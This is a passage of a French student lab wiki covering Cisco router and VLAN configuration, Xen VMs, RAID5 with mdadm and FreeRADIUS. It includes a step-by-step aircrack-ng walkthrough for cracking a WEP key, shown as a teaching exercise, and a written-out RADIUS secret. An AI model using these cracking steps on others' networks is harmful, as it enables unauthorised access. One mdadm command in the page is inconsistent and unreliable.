  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== 3 Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== 3.1 L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== 3.2 Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
